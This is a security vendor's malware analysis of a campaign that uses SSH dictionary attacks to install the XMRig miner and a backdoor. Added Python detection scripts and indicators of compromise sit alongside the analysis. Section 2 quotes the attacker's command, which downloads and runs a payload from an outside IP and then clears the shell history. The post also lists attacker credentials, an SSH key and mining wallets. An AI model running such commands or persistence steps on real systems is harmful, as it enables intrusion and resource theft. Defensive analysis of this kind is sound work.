AhnLab Security Emergency response Center (ASEC) has recently discovered XMRig CoinMiner being installed on poorly managed Linux SSH servers. The attacks have been happening with a distinct pattern since 2022: they involve the usage of malware developed with Shell Script Compiler (SHC) when installing the XMRig, as well as the creation of a backdoor SSH account.
When looking at the attack cases against poorly managed Linux SSH servers, most of them involve the installation of DDoS Bot or CoinMiner. DDoS Bot has been covered here in the ASEC Blog before through the attack cases where ShellBot [1] and ChinaZ DDoS Bot [2] were installed respectively. The installation of XMRig CoinMiner was covered in tandem with the SHC malware [3].
This blog post will cover one of the various attack cases where CoinMiner is installed. The main features of this attack campaign include its relatively recent start, use of SHC, and the inclusion of a personalized message that says “KONO DIO DA” from the threat actor.
1. Dictionary Attack Against Linux SSH Servers
Poorly managed services are one of the most common attack vectors against server environments such as Linux servers. The Secure Shell (SSH) service is installed on most Linux servers, is exposed to the network by design, and is frequently left poorly managed. SSH lets administrators log in remotely and control the system, but only through a user account registered on that system, so the strength of those account credentials decides how hard the server is to break into.
If weak credentials (ID/PW) are used on a Linux system, a threat actor can log in through a brute force or dictionary attack and then execute arbitrary commands. In attacks against poorly managed Linux SSH servers, the usual method is to locate externally exposed SSH servers by port scanning, log in by running a dictionary attack with well-known credentials, and then download malware.
The following is a list of IDs/PWs used in those attacks.
ID | PW | Attacker |
---|---|---|
root | . | 23.224.232[.]68 |
root | … | 23.224.232[.]68 |
root | P@ssw0rd | 23.224.232[.]68 |
admin | password1! | 23.224.232[.]68 |
web | 123456 | 23.224.232[.]68 |
tomcat | tomcat | 23.224.232[.]68 |
centos | Huawei@123 | 23.224.232[.]68 |
oracle | Huawei@123 | 23.224.232[.]68 |
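The pattern in the table above, one source address cycling through many ID/PW pairs before one of them succeeds, is easy to spot in the sshd log if someone looks. The following Python script is an added example, not code from the ASEC post: it parses standard OpenSSH "Failed password" / "Accepted" syslog lines, flags a source as a dictionary attack once it exceeds a failure or distinct-username threshold (both thresholds are assumptions), and reports any successful login from a flagged source as a likely compromise. The log lines are constructed for illustration; only the attacker address is taken from the table.

```python
"""Flag SSH dictionary attacks and the logins that follow them in sshd log lines.

Added example (not from the ASEC post). The sample log below is constructed to
mimic the campaign: one source tries root, admin, web, tomcat, centos and
finally succeeds as tomcat. Line format follows OpenSSH's syslog messages.
"""
import re
from collections import defaultdict

FAILED_RE = re.compile(
    r"Failed password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\d{1,3}(?:\.\d{1,3}){3}) port \d+ ssh2"
)
ACCEPTED_RE = re.compile(
    r"Accepted (?:password|publickey) for (?P<user>\S+) "
    r"from (?P<ip>\d{1,3}(?:\.\d{1,3}){3}) port \d+ ssh2"
)

# Constructed sample log; the attacker IP is the one listed in the article's table.
SAMPLE_LOG = """\
Apr 24 10:01:02 srv sshd[1201]: Failed password for root from 23.224.232.68 port 41022 ssh2
Apr 24 10:01:05 srv sshd[1203]: Failed password for root from 23.224.232.68 port 41024 ssh2
Apr 24 10:01:09 srv sshd[1205]: Failed password for invalid user admin from 23.224.232.68 port 41030 ssh2
Apr 24 10:01:12 srv sshd[1207]: Failed password for invalid user web from 23.224.232.68 port 41033 ssh2
Apr 24 10:01:15 srv sshd[1209]: Failed password for tomcat from 23.224.232.68 port 41040 ssh2
Apr 24 10:01:19 srv sshd[1211]: Failed password for invalid user centos from 23.224.232.68 port 41047 ssh2
Apr 24 10:01:25 srv sshd[1213]: Accepted password for tomcat from 23.224.232.68 port 41052 ssh2
Apr 24 10:02:40 srv sshd[1250]: Failed password for alice from 10.0.0.7 port 50011 ssh2
Apr 24 10:02:48 srv sshd[1252]: Accepted publickey for alice from 10.0.0.7 port 50013 ssh2
"""


def analyze(log_text, fail_threshold=5, distinct_user_threshold=3):
    """Return flagged source IPs, successful logins from them, and per-IP failure counts.

    A source is flagged when it produced at least fail_threshold failures or
    tried at least distinct_user_threshold different usernames (thresholds are
    assumptions; tune them to the host's normal traffic).
    """
    failures = defaultdict(list)   # ip -> [username tried, ...]
    accepted = defaultdict(list)   # ip -> [username that got in, ...]
    for line in log_text.splitlines():
        m = FAILED_RE.search(line)
        if m:
            failures[m["ip"]].append(m["user"])
            continue
        m = ACCEPTED_RE.search(line)
        if m:
            accepted[m["ip"]].append(m["user"])

    flagged = sorted(
        ip for ip, users in failures.items()
        if len(users) >= fail_threshold or len(set(users)) >= distinct_user_threshold
    )
    # A success from a flagged source means the dictionary attack worked: treat the host as compromised.
    compromised = {ip: sorted(set(accepted[ip])) for ip in flagged if accepted.get(ip)}
    return {
        "flagged": flagged,
        "compromised": compromised,
        "failures": {ip: len(users) for ip, users in failures.items()},
    }


if __name__ == "__main__":
    result = analyze(SAMPLE_LOG)
    for ip in result["flagged"]:
        print(f"dictionary attack from {ip}: {result['failures'][ip]} failed logins")
        if ip in result["compromised"]:
            print(f"  successful login as {result['compromised'][ip]} - investigate this host")
```

On a real host, feed it `/var/log/auth.log` or the output of `journalctl -u ssh`; the single-user failure from 10.0.0.7 stays below both thresholds and is not reported.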
2. Cases of KONO DIO DA Attacks – Latest
After logging in successfully, the threat actor ran the commands below to download and execute the malware. “uname -a” and “nproc” print the kernel and architecture information and the number of processing units; presumably the threat actor records these to judge which systems are worth mining on and to keep track of which systems have a CoinMiner installed later on. The final two commands clear the shell history once the malware has been executed, removing the trace of the download.
# uname -a;nproc; wget -q 46.41.150[.]129/.bo/am ; chmod +x am ; ./am ; history -c ; rm -rf ~/.bash_history
The downloaded “am” file is a downloader built with Shell Script Compiler (SHC), which means the original malware is a Bash script that was converted into an ELF executable. SHC and the malware built with it were covered in an earlier ASEC blog post [3].
“am” is a simple downloader that downloads and executes “nw”, and “nw” is itself a downloader that fetches and runs the remaining malware. The “nw” Bash script first forcefully terminates and deletes the CoinMiner and other malware from the threat actor’s previous installations, then downloads and executes a compressed file containing XMRig and the Bash script malware.
The compressed file contains XMRig saved under the file name “dbus-daemon --system --address=systemd_ --nofork --nopidfile --systemd-activation --syslog-only” (the whole string, spaces included, is the file name), the configuration file “config.json”, and three Bash scripts.
“nw” executes the “start” Bash script from the compressed file; “start” executes the “admin” Bash script; and “admin” registers a cron task that executes the “root.sh” Bash script every minute.
“root.sh” executes the XMRig file “dbus-daemon --system --address=systemd_ --nofork --nopidfile --systemd-activation --syslog-only” from the same path, and XMRig reads the mining settings it needs from “config.json” in that same path. XMRig thus runs under the name of a legitimate system process, “dbus-daemon”, and because the file name also carries the arguments the real system bus daemon is started with, a process listing shows both the name and the command line of a normal dbus-daemon, making it hard for an ordinary user to notice that a CoinMiner is running.
Mining Pool | Wallet | Password |
---|---|---|
xmr.doi-2020[.]net:14444 | 85myxAJXqM1i9RLd1b7xq4JddqUTt1fD9ikYNNfwgtZPh42Cm5PSRMQW9R7Sue28TS86bWRkiw3MV8K4ZRGaMw6ZVLLLbMQ.worker01/bolus.eu@gmail.com | worker01 |
val.doi-2020[.]net:80 | 87FWpUCibvHQPvqhjyKg6n18yDpLHh96cVMxtPW1WWEhbePvK5LrDhE5sYgHEpRuU1RkJ5VZ8mBxJ3RbGMe2WXeC1x9TNrF | x |
142.202.242[.]45:80 | 87FWpUCibvHQPvqhjyKg6n18yDpLHh96cVMxtPW1WWEhbePvK5LrDhE5sYgHEpRuU1RkJ5VZ8mBxJ3RbGMe2WXeC1x9TNrF | x |
pool.hashvault[.]pro:80 | 87FWpUCibvHQPvqhjyKg6n18yDpLHh96cVMxtPW1WWEhbePvK5LrDhE5sYgHEpRuU1RkJ5VZ8mBxJ3RbGMe2WXeC1x9TNrF | x |
AS.doi-2020[.]net:80 | 85myxAJXqM1i9RLd1b7xq4JddqUTt1fD9ikYNNfwgtZPh42Cm5PSRMQW9R7Sue28TS86bWRkiw3MV8K4ZRGaMw6ZVLLLbMQ | x |
139.99.123[.]196:80 | 85myxAJXqM1i9RLd1b7xq4JddqUTt1fD9ikYNNfwgtZPh42Cm5PSRMQW9R7Sue28TS86bWRkiw3MV8K4ZRGaMw6ZVLLLbMQ | x |
pool.supportxmr[.]com:80 | 87FWpUCibvHQPvqhjyKg6n18yDpLHh96cVMxtPW1WWEhbePvK5LrDhE5sYgHEpRuU1RkJ5VZ8mBxJ3RbGMe2WXeC1x9TNrF | x |
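Because the miner copies both the process name and the argument list of the real system bus daemon, a check based on `ps` output alone will not catch it. What the copy cannot fake is where the executable actually lives and who started it. The following Python script is an added example, not code from the ASEC post: it scores each process on the path behind `/proc/<pid>/exe`, whether that path sits under a scratch or home directory, whether the binary was unlinked after launch, whether a system daemon was started by something other than init, and whether the command line carries miner-style options. The process table is constructed to mirror the article; the expected binary locations, the "system daemons are children of PID 1" rule and the miner-argument heuristic are assumptions for a typical systemd host and should be adjusted per image.

```python
"""Flag processes that borrow the name and arguments of a system daemon.

Added example (not from the ASEC post). SAMPLE_PROCS is constructed: the real
dbus-daemon, an XMRig copy renamed to dbus-daemon with the same argv, sshd, and
a second miner hiding as "kworker". EXPECTED_EXE paths, the PID-1 parent rule
and MINER_ARGS are assumptions, not facts from the article.
"""
import os
import re

# Genuine system daemons and where their binaries live on common distributions (assumed paths).
EXPECTED_EXE = {
    "dbus-daemon": ("/usr/bin/dbus-daemon", "/bin/dbus-daemon"),
    "sshd": ("/usr/sbin/sshd",),
}
# A system daemon executing from any of these prefixes is not the real one.
SCRATCH_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/", "/home/", "/root/")
# Options XMRig accepts on the command line even when the binary is renamed (heuristic; a miner
# that takes everything from config.json, as in the article, shows none of them).
MINER_ARGS = re.compile(
    r"(?:^|\s)(?:--donate-level|--algo|-o\s+\S+:\d{3,5}|-u\s+[48][1-9A-Za-z]{94})(?:\s|$)"
)

SAMPLE_PROCS = [
    {"pid": 812, "ppid": 1, "comm": "dbus-daemon", "exe": "/usr/bin/dbus-daemon",
     "cmdline": ["/usr/bin/dbus-daemon", "--system", "--address=systemd:", "--nofork",
                 "--nopidfile", "--systemd-activation", "--syslog-only"]},
    # The miner from the article: same name, same argv, but launched by cron from a scratch dir.
    {"pid": 4471, "ppid": 4468, "comm": "dbus-daemon", "exe": "/var/tmp/.x/dbus-daemon",
     "cmdline": ["./dbus-daemon", "--system", "--address=systemd_", "--nofork",
                 "--nopidfile", "--systemd-activation", "--syslog-only"]},
    {"pid": 1337, "ppid": 1, "comm": "sshd", "exe": "/usr/sbin/sshd", "cmdline": ["/usr/sbin/sshd", "-D"]},
    # Constructed second case: binary deleted after start, pool and donate options on the command line.
    {"pid": 2204, "ppid": 2200, "comm": "kworker", "exe": "/tmp/kworker (deleted)",
     "cmdline": ["kworker", "-o", "pool.example:14444", "--donate-level", "0"]},
]


def check(proc):
    """Return the list of reasons a process record looks like a masquerading miner."""
    reasons = []
    comm, exe = proc["comm"], proc["exe"]
    if comm in EXPECTED_EXE:
        if not exe.startswith(EXPECTED_EXE[comm]):
            reasons.append(f"named {comm!r} but exe is {exe!r}")
        if proc["ppid"] != 1:
            reasons.append(f"system daemon started by pid {proc['ppid']}, not init")
    if exe.startswith(SCRATCH_DIRS):
        reasons.append("runs from a scratch/home directory")
    if exe.endswith(" (deleted)"):
        reasons.append("binary unlinked after launch")
    if MINER_ARGS.search(" ".join(proc["cmdline"])):
        reasons.append("mining-style arguments")
    return reasons


def scan(procs):
    """Map pid -> reasons for every process that triggered at least one check."""
    return {p["pid"]: r for p in procs if (r := check(p))}


def live_procs():
    """Collect the same fields from a live /proc (Linux only; needs root to read every exe link)."""
    out = []
    for pid in filter(str.isdigit, os.listdir("/proc")):
        try:
            with open(f"/proc/{pid}/comm") as f:
                comm = f.read().strip()
            with open(f"/proc/{pid}/cmdline", "rb") as f:
                cmdline = [a.decode(errors="replace") for a in f.read().split(b"\0") if a]
            with open(f"/proc/{pid}/stat") as f:          # "pid (comm) state ppid ..."
                ppid = int(f.read().rsplit(")", 1)[1].split()[1])
            exe = os.readlink(f"/proc/{pid}/exe")
        except OSError:
            continue
        out.append({"pid": int(pid), "ppid": ppid, "comm": comm, "exe": exe, "cmdline": cmdline})
    return out


if __name__ == "__main__":
    for pid, reasons in scan(SAMPLE_PROCS).items():
        print(pid, "; ".join(reasons))
```

Run `scan(live_procs())` as root on a suspect host; the genuine dbus-daemon (pid 812) passes every check while the renamed XMRig is caught three times over, without looking at the argument list at all.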
3. Cases of KONO DIO DA Attacks – Past
Looking at past cases, the malware used in the recent attacks has fewer features than before. The initially installed file could not be confirmed, but “hoze” is a Bash script that performs the same function as “nw”: it decompresses the downloaded compressed file and executes an ELF file named “init0”. “init0” is a malware strain that provides various additional features beyond installing the XMRig CoinMiner.
Unlike the recently confirmed attacks, the “KONO DIO DA” threat actor used a wider range of features in past attacks, chief among them maintaining persistence. The compressed file contained a file named “key”.
The “key” file held the following public SSH key. “init0” removes the existing “~/.ssh/authorized_keys” file and copies the “key” file from the compressed file to that path.
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCh047MLLA8ul64R+zVcEezUGtPUhnB+6mSzXoikFgju2orDUBX4K1ve/SW2pMQeQf9ErQojugX43N0iJYtuZUCgtH3A3oLV7zlhbkMuxjfgoUEovBXlAe9sXtLPnbYE999hT0M+OVv2l5/dDgiXs3eG9/BtcuPBEQ4lnH2YdFkckUJmrQQctA1ItFGTNB9fiFu44bH7JjRxSPt97PJPjeEcbEMdJyx4y827NpogeL2QSCfj7II9XdfgaarEOeEF9abY6+1RqDhElhz4ZSQTfoSkl8/8LyBXun7ybdVYxxJdxGznDpNBHyYEcKZFRy9q4mTHBeXMlWiGimSpE7dyhuT rsa-key
SSH supports public-key authentication in addition to passwords: the user generates a key pair, registers the public key in “~/.ssh/authorized_keys” on the server, and then logs in from the client with the private key, without entering an ID and PW. Here the threat actor registers their own public key, the “key” file, in that path so that they can log into the infected system later with the matching private key.
The threat actor also adds an account called “cheeki” using the usermod command, and if the infected system has an account called “root”, “dolphinscheduler”, “admin”, “es”, or “hadoop”, its password is changed by the threat actor. This is a persistence technique: a backdoor account on the infected system lets the threat actor log in again at a later date.
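Both persistence methods leave artifacts that can be audited against a known-good baseline: an unexpected public key in authorized_keys and an account that the image never had. The following Python script is an added example, not code from the ASEC post. It parses authorized_keys entries in OpenSSH's wire format, computes the same SHA256 fingerprint `ssh-keygen -lf` prints, compares each key against an allowlist of fingerprints, and separately diffs /etc/passwd against a baseline user list. The attacker's key is the one quoted above; the legitimate admin key, the allowlist, the passwd lines and the baseline set are constructed for illustration.

```python
"""Audit SSH persistence: unknown authorized_keys entries and backdoor accounts.

Added example (not from the ASEC post). ATTACKER_KEY is the public key published
in the article; ADMIN_ENTRY, ALLOWED_FINGERPRINTS, SAMPLE_PASSWD and
BASELINE_USERS are constructed for illustration.
"""
import base64
import hashlib
import struct

KEY_TYPES = ("ssh-rsa", "ssh-ed25519", "ecdsa-sha2-nistp256",
             "ecdsa-sha2-nistp384", "ecdsa-sha2-nistp521", "ssh-dss")

ATTACKER_KEY = (
    "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCh047MLLA8ul64R+zVcEezUGtPUhnB+6mSzXoikFgju2orDUBX4K1ve/"
    "SW2pMQeQf9ErQojugX43N0iJYtuZUCgtH3A3oLV7zlhbkMuxjfgoUEovBXlAe9sXtLPnbYE999hT0M+OVv2l5/dDgiXs3eG9/"
    "BtcuPBEQ4lnH2YdFkckUJmrQQctA1ItFGTNB9fiFu44bH7JjRxSPt97PJPjeEcbEMdJyx4y827NpogeL2QSCfj7II9Xdfgaar"
    "EOeEF9abY6+1RqDhElhz4ZSQTfoSkl8/8LyBXun7ybdVYxxJdxGznDpNBHyYEcKZFRy9q4mTHBeXMlWiGimSpE7dyhuT rsa-key"
)


def _wire(*fields):
    """Encode fields as SSH wire-format strings: 4-byte big-endian length followed by the bytes."""
    return b"".join(struct.pack(">I", len(f)) + f for f in fields)


def parse_pubkey(entry):
    """Parse one authorized_keys line (leading options are skipped) into type, fingerprint, size."""
    tokens = entry.split()
    idx = next((i for i, t in enumerate(tokens) if t in KEY_TYPES), None)
    if idx is None:
        raise ValueError(f"no recognised key type in: {entry!r}")
    ktype, b64 = tokens[idx], tokens[idx + 1]
    blob = base64.b64decode(b64, validate=True)
    fields, off = [], 0
    while off < len(blob):                       # walk the length-prefixed fields
        (n,) = struct.unpack(">I", blob[off:off + 4])
        fields.append(blob[off + 4:off + 4 + n])
        off += 4 + n
    if fields[0] != ktype.encode():
        raise ValueError(f"blob says {fields[0]!r} but line says {ktype}")
    # OpenSSH's SHA256 fingerprint: base64 of sha256(blob) with padding stripped.
    fp = "SHA256:" + base64.b64encode(hashlib.sha256(blob).digest()).decode().rstrip("=")
    bits = int.from_bytes(fields[2], "big").bit_length() if ktype == "ssh-rsa" else None
    return {"type": ktype, "fingerprint": fp, "bits": bits,
            "comment": " ".join(tokens[idx + 2:]), "options": " ".join(tokens[:idx])}


# Constructed legitimate key (fixed 32-byte value, not a real ed25519 point) for the allowlist.
ADMIN_ENTRY = "ssh-ed25519 " + base64.b64encode(_wire(b"ssh-ed25519", bytes(range(32)))).decode() + " admin@bastion"
ALLOWED_FINGERPRINTS = {parse_pubkey(ADMIN_ENTRY)["fingerprint"]}
SAMPLE_AUTHORIZED_KEYS = "\n".join(["# bastion admin", ADMIN_ENTRY, ATTACKER_KEY])


def audit_authorized_keys(text, allowed):
    """Return parsed entries whose fingerprint is not in the allowlist."""
    unknown = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        info = parse_pubkey(line)
        if info["fingerprint"] not in allowed:
            unknown.append(info)
    return unknown


# Constructed /etc/passwd excerpt: "cheeki" is the backdoor account named in the article.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
messagebus:x:81:81::/nonexistent:/usr/sbin/nologin
hadoop:x:1001:1001::/home/hadoop:/bin/bash
cheeki:x:1002:1002::/home/cheeki:/bin/bash
"""
BASELINE_USERS = {"root", "daemon", "messagebus", "hadoop"}   # constructed known-good list


def audit_passwd(text, baseline):
    """Return (user, reason) for accounts missing from the baseline or sharing uid 0 with root."""
    findings = []
    for line in text.splitlines():
        if not line.strip():
            continue
        name, _pw, uid, _gid, _gecos, _home, shell = line.split(":")
        if name not in baseline:
            findings.append((name, f"account not in baseline (uid {uid}, shell {shell})"))
        elif int(uid) == 0 and name != "root":
            findings.append((name, "extra uid-0 account"))
    return findings


if __name__ == "__main__":
    for k in audit_authorized_keys(SAMPLE_AUTHORIZED_KEYS, ALLOWED_FINGERPRINTS):
        print(f"unknown key: {k['type']} {k['bits'] or ''} {k['fingerprint']} {k['comment']}")
    for user, why in audit_passwd(SAMPLE_PASSWD, BASELINE_USERS):
        print(f"suspicious account {user}: {why}")
```

Run the same audit over every user's `~/.ssh/authorized_keys` (and `/root/.ssh`), not only the accounts you expect to have keys; the fingerprint it prints for the attacker's key can be checked against `ssh-keygen -lf` on the same line and then fed straight into a blocklist.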
The “uninstall.sh” Bash script is responsible for removing Aegis, the host security agent of the Alibaba Cloud security service (Alibaba Cloud Shield). Kinsing is a malware strain known for removing Aegis in the same way; Kinsing installs a Bash script that removes not only Aegis but also Tencent QCloud Monitor, and that can disable SELinux and AppArmor as well.
Contrary to its name, “init.sh” is an SHC ELF file with a simple structure. It is responsible for executing the CoinMiner and hiding its process: it creates the “/var/tmp/…” directory and bind-mounts it (mount --bind) over the miner’s entry in the /proc file system, “/proc/<PID>”, so that tools such as ps and top, which enumerate /proc, no longer see the process. This is a previously known process-concealment method, and the threat actor uses this single command instead of a rootkit to conceal the CoinMiner’s process.
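The bind-mount trick hides the process from /proc readers but leaves two loud traces: the mount itself appears in /proc/mounts with a mount point of exactly /proc/<PID>, and the kernel still answers for the PID (signal 0 succeeds) even though /proc/<PID>/stat has vanished under the overlay. The following Python script is an added example, not code from the ASEC post: it parses a /proc/mounts snapshot for mounts over individual /proc/<PID> directories and diffs "alive" PIDs against "visible" PIDs. Both snapshots are constructed; the PID and device names are illustrative.

```python
"""Detect processes hidden by bind-mounting a directory over /proc/<PID>.

Added example (not from the ASEC post). SAMPLE_MOUNTS, SAMPLE_ALIVE and
SAMPLE_VISIBLE are constructed views of one infected host; live_check()
gathers the same data on a real Linux system.
"""
import os
import re

# Nothing legitimate mounts on top of a single process directory; proc itself mounts on /proc,
# and binfmt_misc mounts on /proc/sys/fs/binfmt_misc, neither of which matches this pattern.
PROC_PID_MOUNT = re.compile(r"^(?P<src>\S+)\s+/proc/(?P<pid>\d+)\s+(?P<fstype>\S+)\s")

SAMPLE_MOUNTS = """\
proc /proc proc rw,nosuid,nodev,noexec,relatime 0 0
/dev/sda1 / ext4 rw,relatime,errors=remount-ro 0 0
tmpfs /run tmpfs rw,nosuid,nodev,mode=755 0 0
binfmt_misc /proc/sys/fs/binfmt_misc binfmt_misc rw,nosuid,nodev,noexec,relatime 0 0
/dev/sda1 /proc/4471 ext4 rw,relatime,errors=remount-ro 0 0
"""

# Constructed: the kernel knows 4471 exists, but ps (which reads /proc/<pid>/stat) never lists it.
SAMPLE_ALIVE = {1, 812, 1337, 4468, 4471}
SAMPLE_VISIBLE = {1, 812, 1337, 4468}


def find_overmounted_pids(mounts_text):
    """Return one record per mount whose mount point is exactly /proc/<pid>."""
    hits = []
    for line in mounts_text.splitlines():
        m = PROC_PID_MOUNT.match(line)
        if m:
            hits.append({"pid": int(m["pid"]), "source": m["src"], "fstype": m["fstype"]})
    return hits


def hidden_pids(alive, visible):
    """PIDs the kernel reports as existing but whose /proc entry cannot be read."""
    return sorted(set(alive) - set(visible))


def live_check(max_pid=None):
    """Run both checks on the current host (Linux only). Returns (overmounts, hidden)."""
    with open("/proc/mounts") as f:
        overmounts = find_overmounted_pids(f.read())
    if max_pid is None:
        with open("/proc/sys/kernel/pid_max") as f:
            max_pid = int(f.read())
    alive, visible = set(), set()
    for pid in range(1, max_pid + 1):
        try:
            os.kill(pid, 0)            # signal 0: existence check only, nothing is delivered
        except ProcessLookupError:
            continue
        except PermissionError:
            pass                       # exists but belongs to another user: still alive
        alive.add(pid)
        if os.path.exists(f"/proc/{pid}/stat"):
            visible.add(pid)
    return overmounts, hidden_pids(alive, visible)


if __name__ == "__main__":
    for hit in find_overmounted_pids(SAMPLE_MOUNTS):
        print(f"/proc/{hit['pid']} is covered by {hit['source']} ({hit['fstype']})")
    print("alive but invisible:", hidden_pids(SAMPLE_ALIVE, SAMPLE_VISIBLE))
```

Once a covered PID is found, `umount /proc/<PID>` restores the entry so the process can be inspected and killed normally; the PID-range sweep in `live_check` is slow on hosts with a large pid_max but needs no privileges beyond reading /proc.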
The scripts and SHC ELF files above play supporting roles; the main functionality is in “secure”. “secure” is an SHC-built ELF file that executes the XMRig CoinMiner, installs the latest XMRig, and registers itself as a cron task. Because it runs periodically through cron, if XMRig is missing from the system the latest version is downloaded again and mining resumes on the infected system.
Most attack cases against poorly managed Linux SSH servers involve installing a DDoS bot or a CoinMiner, and most CoinMiner cases have no notable characteristics beyond XMRig being installed to mine Monero. The “KONO DIO DA” threat actor, however, deploys additional malware and various analysis-disruption techniques alongside XMRig, and these attacks were confirmed relatively recently.
Mining Pool | Wallet | Password |
---|---|---|
5.9.157[.]2:10380 | TRTLv1M57YFZjutXRds3cNd6iRurtebcy6HxQ6hRMCzGF5nE4sWuqCCX9vamnUcG35BkQy6VfwUy5CsV9YNomioPGGyVhKTze3C | x |
2.58.149[.]237:2007 | TRTLv1M57YFZjutXRds3cNd6iRurtebcy6HxQ6hRMCzGF5nE4sWuqCCX9vamnUcG35BkQy6VfwUy5CsV9YNomioPGGyVhKTze3C | x |
4. Conclusion
Attack campaigns that install a CoinMiner on poorly managed Linux SSH servers have been occurring persistently for years. The “KONO DIO DA” campaign covered here installs the XMRig CoinMiner and additionally maintains persistence by registering a backdoor SSH account. Once a CoinMiner is installed, the system’s resources are spent mining Monero for the threat actor, who can later log in through the backdoor SSH account to install additional malware, steal information from the system, or perform other malicious actions.
Administrators should therefore use passwords that are difficult to guess and change them periodically to protect Linux servers from brute force and dictionary attacks, and apply the latest patches to prevent exploitation of vulnerabilities. Better still, disable password authentication in sshd in favour of key-based logins and disallow direct root login, which removes the dictionary attack vector entirely. Servers accessible from outside should additionally be protected with security products such as firewalls to restrict attacker access. Finally, V3 should be kept updated to the latest version to block malware infections in advance.
File Detection
– CoinMiner/Text.Config (2023.04.24.02)
– Downloader/Linux.Agent.1011056 (2023.04.24.02)
– Downloader/Linux.Agent.11344 (2023.04.24.02)
– Downloader/Shell.Agent.SC187868 (2023.04.24.02)
– Downloader/Shell.Agent.SC187872 (2023.04.24.02)
– Linux/CoinMiner.Gen2 (2019.07.31.08)
– Trojan/Linux.Agent.1010416 (2023.04.24.02)
– Trojan/Linux.Hider.1008280 (2023.04.24.02)
– Trojan/Shell.Agent.SC187867 (2023.04.24.02)
– Trojan/Shell.Agent.SC187876 (2023.04.24.02)
– Trojan/Shell.Runner.SC187869 (2023.04.24.02)
– Trojan/Shell.Runner.SC187871 (2023.04.24.02)
IOC
MD5
– ea30afd4f65f8866bebcaf92168f3241: Latest version of the downloader (am)
– 1192697ed3d2302bec3ee828c154e300: Latest version of the downloader Bash script (nw)
– 1db93cb95e409769561efb66e4fd5c72: Bash script (start)
– 6e9001516053770f6dd645954240bced: Bash script (admin)
– a978aec11a072855e2cfba593160886e: Bash script (root.sh)
– 4f1661d873cef8a3fa3ca34080816e87: XMRig CoinMiner (dbus-daemon --system --address=systemd_ --nofork --nopidfile --systemd-activation --syslog-only)
– 20ac8a45d129e3ce3444494d9672692c: XMRig Configuration File (config.json)
– 5c1ad4a8335fc406040a070b2be661ff: Past version of the downloader Bash script (hoze)
– 90948ae9f7d167d4016c7a56477a67b3: Past version of the downloader (init0)
– 1932d2e4081f6dd5c8b32d29b1ab5caf: Bash script (init.sh)
– e4cc1a7f992909e8509520fdd6c9a3f7: Bash script (uninstall.sh)
– bb497b86c26893e10432781c6550e5fc: Bash script (secure)
– 254784ca05bdd3928d7889d0ea3195ab: XMRig CoinMiner (xri)
– 5f89f90efd1568618e72bb30b8e44fce: XMRig Configuration File (config.json)
– 5aa60757665510b2c8e9bb924c2b40ef: XMRig Configuration File (config32.json)
Download URLs
– hxxp://46.41.150[.]129/.bo/am: Latest version of the downloader (am), fetched right after the dictionary attack
– hxxp://46.41.150[.]129/.bo/nw: Latest version of the downloader Bash script (nw)
– hxxp://46.41.150[.]129/.js/new-xmrig.tgz: Compressed file containing XMRig and the Bash scripts (downloaded by nw)
– hxxp://2.58.149[.]237:6972/hoze: Past version of the downloader Bash script (hoze)
– hxxp://2.58.149[.]237:6972/xri2.tar: Past version of the compressed CoinMiner package (downloaded by hoze)
– hxxp://141.95.19[.]91:8080/xri/xri: Downloads XMRig CoinMiner
– hxxp://141.95.19[.]91:8080/xri/config.json: Downloads XMRig configuration file
Source: https://asec.ahnlab.com/en/51908/